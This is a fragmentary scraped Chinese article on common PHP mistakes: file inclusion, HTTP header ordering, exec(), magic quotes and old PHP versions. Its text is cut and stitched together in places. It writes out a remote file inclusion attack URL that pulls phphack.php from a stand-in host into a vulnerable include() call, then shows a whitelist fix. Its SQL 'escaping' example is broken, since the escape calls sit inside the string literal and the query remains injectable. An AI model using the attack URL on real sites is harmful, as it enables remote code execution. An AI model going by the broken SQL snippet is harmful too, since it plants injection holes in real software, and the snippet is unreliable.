时间:2021-07-01 10:21:17 帮助过:35人阅读
输出都分成两个部分:头部和正文。
- <br><?php <br>$sql = "UPDATE users SET <br>name='.mysql_real_escape_string($name).' <br>WHERE id='.mysql_real_escape_string ($id).'"; <br>mysql_query($sql); <br>?> <br> <br><strong>3.错误的使用HTTP-header 相关的函数: header(), session_start(), setcookie()</strong> <br>遇到过这个警告吗?"warning: Cannot add header information - headers already sent [....] <br><br>每次从服务器下载一个网页的时候,服务器的
输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。
- <br>index.php <br><? <br>//including header, config, database connection, etc <br>include($_GET['filename']); <br>//including footer <br>?> <br> <br>现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?filename=anyfile.txt <br>来获取你的机密信息,或执行一个PHP脚本。 <br>如果allow_url_fopen=On,你更是死定了: <br>试试这个输入: <br>http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php <br>现在你的网页中包含了http://www.youaredoomed.com/phphack.php的
输出:
- <br><? <br>//Include only files that are allowed. <br>$allowedFiles = array('file1.txt','file2.txt','file3.txt'); <br>if(in_array((string)$_GET['filename'],$allowedFiles)) { <br>include($_GET['filename']); <br>} <br>else{ <br>exit('not allowed'); <br>} <br>?> <br> <br><strong>5. 语法错误</strong> <br>语法错误包括所有的词法和语法错误,太常见了,以至于我不得不在这里列出。解决办法就是认真学习PHP的语法,仔细一点不要漏掉一个括号,大括号,分号,引号。还有就是换个好的编辑器,就不要用记事本了! <br><strong>6.很少使用或不用面向对象 <br></strong>很多的项目都没有使用PHP的面向对象技术,结果就是代码的维护变得非常耗时耗力。PHP支持的面向对象技术越来越多,越来越好,我们没有理由不使用面向对象。 <br><strong>7. 不使用framework</strong> <br>95% 的PHP项目都在做同样的四件事: Create, edit, list 和delete. 现在有很多MVC的框架来帮我们完成这四件事,我们为何不使用他们呢? <br><strong>8. 不知道PHP中已经有的功能</strong> <br>PHP的核心包含很多功能。很多程序员重复的发明轮子。浪费了大量时间。编码之前搜索一下PHP mamual,在google上检索一下,也许会有新的发现!PHP中的exec()是一个强大的函数,可以执行cmd shell,并把执行结果的最后一行以字符串的形式返回。考虑到安全可以使用EscapeShellCmd() <br><strong>9.使用旧版本的PHP <br></strong>很多程序员还在使用PHP4,在PHP4上开发不能充分发挥PHP的潜能,还存在一些安全的隐患。转到PHP5上来吧,并不费很多功夫。大部分PHP4程序只要改动很少的语句甚至无需改动就可以迁移到PHP5上来。根据http://www.nexen.net的调查 只有12%的PHP服务器使用PHP5,所以有88%的PHP开发者还在使用PHP4. <br><strong>10.对引号做两次转意 <br></strong>见过网页中出现\'或\'"吗?这通常是因为在开发者的环境中magic_quotes 设置为off,而在部署的服务器上magic_quotes =on. PHP会在 GET, POST 和 COOKIE中的数据上重复运行addslashes() 。 <br>原始文本: <br>It's a string <br><br>magic quotes on : <br>It\'s a string <br>又运行一次 <br>addslashes(): <br>It\\'s a string <br><br>HTML